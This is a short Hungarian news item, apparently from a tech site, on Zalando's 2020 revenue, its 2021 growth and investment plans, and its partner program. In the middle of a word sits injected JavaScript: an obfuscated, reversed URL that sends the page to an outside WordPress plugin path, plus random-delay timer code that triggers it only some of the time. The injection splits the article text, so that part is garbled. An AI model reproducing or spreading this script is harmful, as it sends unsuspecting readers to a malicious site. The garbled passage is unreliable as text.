A vállalat hosszú távon arra törekszik, hogy kiszolgálhassa a hozzávetőlegesen 450 milliárd euró értékű teljes európai divatpiac 10 százalékát. A közlemény szerint tavaly a Zalando árbevétele 8 milliárd euró volt, az előző év azonos időszakához képest 23,1 százalékkal nőtt, idén pedig éves szinten 24-29 százalékos árbevétel növekedéssel, 9,9-10,3 milliárd euró bevétellel számolnak. Hozzátették, hogy a vállalat 2021-ben 350-400 millió euró értékű tőkeberuházással fejleszti logisztikai infrastruktúráját, valamint technológiai platformját. A Zalando fontoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos része számos márka, üzlet és kiskereskedő digitális értékesítési stratégiájának, tavaly a negyedik negyedévében a Zalando partner programja 24 százalékot tett ki a webshop teljes forgalmából. Tavaly év végéig több…
A cikk folytatódik: http://itmozaik.co.hu/hirek/2021/03/19/a-zalando-online-divataruhaz-2022-ben-lep-be-a-magyarorszagi-piacra.html
- Hirdetés -